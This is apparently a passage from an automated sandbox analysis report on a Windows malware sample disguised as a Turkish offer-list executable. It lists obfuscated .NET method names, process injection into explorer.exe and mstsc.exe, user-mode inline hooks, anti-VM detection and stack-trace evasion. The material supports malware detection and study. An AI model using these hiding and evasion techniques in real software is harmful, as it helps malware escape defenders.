          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, eDTX6S33VGLGAsL4lRj.csHigh entropy of concatenated method names: 'ToString', 'kdb8h0yPIe', 'bBM8qHRJ1M', 'nTg8ofUWHS', 'QHr8TNlAC1', 'gkE80fi8wR', 'm2q8KPwVwy', 'bPQ87l4MSV', 'lI7P326XBOUmy1MapVK', 'DswoQF6KT8YcMf2SxXL'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, Gu6jH1KHT2aaVqnGJC.csHigh entropy of concatenated method names: 'Wv3GbiGIuT', 'onZGvy20U0', 'dYAGkYvqK5', 'tLiGiofXcG', 'kqyGL7CNWN', 'yq5GtIKpee', 'QYqGCuqVtb', 'C1LGPY2Ow4', 'vrBGI7Brui', 'YG9GZgQsUT'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, CpXuqheKeNcOl2gM1t.csHigh entropy of concatenated method names: 'HCW9TcjaUu', 'pci9KDPDcS', 'sCs9OIgjmE', 'j1ZOc4Bdpr', 'SSFOz0YgpG', 'InK91MXTo0', 'uog9YY8u6Q', 'eg79NJ8wNN', 'gLK9hB217i', 'owx9qG5KgS'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, pNi9qYEPka9rt5br50.csHigh entropy of concatenated method names: 'wk5xDjW5Jj', 'XJpxcpuMCF', 'u7q31Jad3P', 'ACu3YZhXd9', 'iI1xZL60C6', 'qlyxAk2TdU', 'U8TxeKcRXN', 'PPMxjdVIBE', 'WE6xgigPvw', 'nQsxBe3Mbh'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, cCXDhPnYieu7sLXkQZ.csHigh entropy of concatenated method names: 'Ace0jdUdUL', 'QIy0gEZ24S', 'g6E0Bgc8u4', 'hyH0mnnruk', 'SUu0Wdg61C', 'IAQ0prqQWg', 'ggx0RZ1sqt', 'JqS0DiOmqf', 'FPD0uIL0bG', 'ifd0cFX8SC'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, oEx3AcJSlo38dsWwUD.csHigh entropy of concatenated method names: 'J05aH5Elc', 'qfjHtTYHv', 'VbKr2xJnf', 'yanEgXEhG', 'j6Zv0HxZR', 'VDqMJn9Pn', 'Q5K4OyKWO1s5O2sQHg', 'Wy2T8LBRUwynB9s9nn', 'NMQ3BToFD', 'TuS8EIKrY'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, nFFUXqHlVSKFgwBgWS.csHigh entropy of concatenated method names: 'uQBVIWwM19', 'XioVAs53CB', 'E2dVjhYpha', 'U3JVgnKiut', 'wSBViXbt9g', 'rvMVFCf0ys', 'fugVLdbTkt', 'OLOVtdAi9a', 'xosV5y8O8T', 'zJcVC801MR'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, S07V4koBSSy8qnyCAt.csHigh entropy of concatenated method names: 'MbE3k4qfkD', 'SHY3iKUbBB', 'nX33F5AdRv', 'Brp3L5yQO4', 'rPe3jZ2R7m', 'pPX3thBPc0', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, IfnAblaBLdQWkhCorN.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oUSNu9nfe2', 'loJNcUVtfR', 'OmCNzeXHbS', 'oHuh14Xa98', 'yvThYaFvfO', 'dvUhNKNrsY', 'vlKhhXewoJ', 'pdoTRWtrwE2KjF7Dves'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, VcyhQyiD2xkH0fXI2Z.csHigh entropy of concatenated method names: 'cxl7feVxjq', 'TDb7ExpJSm', 'FQ7KFEcshq', 'at5KLnGMd9', 'cwKKtMXFs3', 'Y7mK5f14Ya', 'MjbKCIlaZg', 'fTaKPpbxtN', 'rmSKlI1hhF', 'xIdKIq9beD'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, D3aJ9nhd632UudjdRf.csHigh entropy of concatenated method names: 'jWyKH9fCVr', 'xPFKrIX3Ta', 'HHLKbk9mbY', 'pg0KvU0sWS', 'fRhKVM8h8N', 'w43KJxRX4Y', 'HSTKx357n8', 'UqUK3GCecb', 'h0ZKnfS8Mg', 'Wp2K8GM7J5'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, BfG1TKQWfgmOliB4Uw.csHigh entropy of concatenated method names: 'lPUnYVPWkm', 'zA2nhjNY0Y', 'Bxqnq7KDe8', 'SGUnT4pDTy', 'UFJn0sL9L1', 'lGAn7Z6mvq', 'LrgnO1ePrE', 'o083RpZgj0', 'Jpk3DxXXEd', 'jZ13ux0Q4y'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, YIiILejVHVtoOOhYTE.csHigh entropy of concatenated method names: 'CRu3TyiUcM', 'oZf30jR9X4', 'PBe3KQ2Q4r', 'WGU37tcOec', 'x2Q3OjDoUY', 'D01396SUkF', 'j81321Ocm4', 'lBl3ycRdhM', 'buL36eka6k', 'BNl3UY6g7M'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, dAYBWvDDYYTIM9prkJ.csHigh entropy of concatenated method names: 'GLKhowAQDu', 'Re4hTNt19w', 'oj3h0LUVy7', 'J4RhKobdiV', 'bG9h7XlSl6', 'KJYhOIBi2n', 'pdph9GgvJ2', 'gmqh2TGRXX', 'zBNhym1orI', 'GK2h6m5q0D'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, rQHPQKwP5AfLbIMCuh.csHigh entropy of concatenated method names: 'bV29QqqI1q', 'kWQ9swQDVC', 'AnK9aBLpyL', 'oLl9H6yrrw', 'eja9f6jfeR', 'NPa9r8DyZZ', 'UhD9EXJtAX', 'iBe9bF7GFY', 'MbP9vvJJjp', 'kma9Mk4hCT'
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, DO6p58WyMYhYgejVx7.csHigh entropy of concatenated method names: 'Dispose', 'XdlYuC79wQ', 'IZINijLNyH', 'u9lXX3U2v9', 'yq2Yc2TSh0', 'nljYzpF2pR', 'ProcessDialogKey', 'otSN1tKJi7', 'VD7NYDfRa9', 'L6aNNJhMXW'

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007A60E0 LoadCursorW,SetCursor,DefWindowProcW,IsIconic,memset,GetTitleBarInfo,GetCursorPos,8_2_007A60E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007A00AA IsIconic,GetWindowPlacement,GetLastError,8_2_007A00AA
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007A0150 IsIconic,GetWindowPlacement,GetLastError,IsZoomed,SetWindowPlacement,GetLastError,SetWindowPos,SetWindowPos,GetClientRect,MoveWindow,8_2_007A0150
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007A5355 GetWindowRect,GetWindowLongW,GetWindowLongW,IntersectRect,MoveWindow,IsIconic,GetWindowPlacement,8_2_007A5355
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007A342A IsZoomed,IsIconic,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,8_2_007A342A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_0079D66C IsIconic,GetWindowPlacement,GetWindowRect,8_2_0079D66C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007A4630 lstrcmpW,LockWindowUpdate,IsIconic,GetWindowPlacement,GetWindowLongW,SetWindowLongW,SetWindowLongW,VariantInit,VariantClear,VariantClear,GetRgnBox,OffsetRgn,VariantClear,ShowWindow,SetWindowPos,SetWindowPos,SetWindowRgn,LockWindowUpdate,8_2_007A4630
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007A2687 DefWindowProcW,IsIconic,GetClientRect,GetLastError,VariantClear,DefWindowProcW,8_2_007A2687
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007A587D IsWindowVisible,IsIconic,8_2_007A587D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_0080C997 GetWindowRect,IsWindow,IsIconic,GetSystemMetrics,GetSystemMetrics,GetWindowRect,PtInRect,PtInRect,SystemParametersInfoW,CopyRect,SetWindowPos,8_2_0080C997
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007DBCF0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_007DBCF0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130ST.exe PID: 6148, type: MEMORYSTR
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
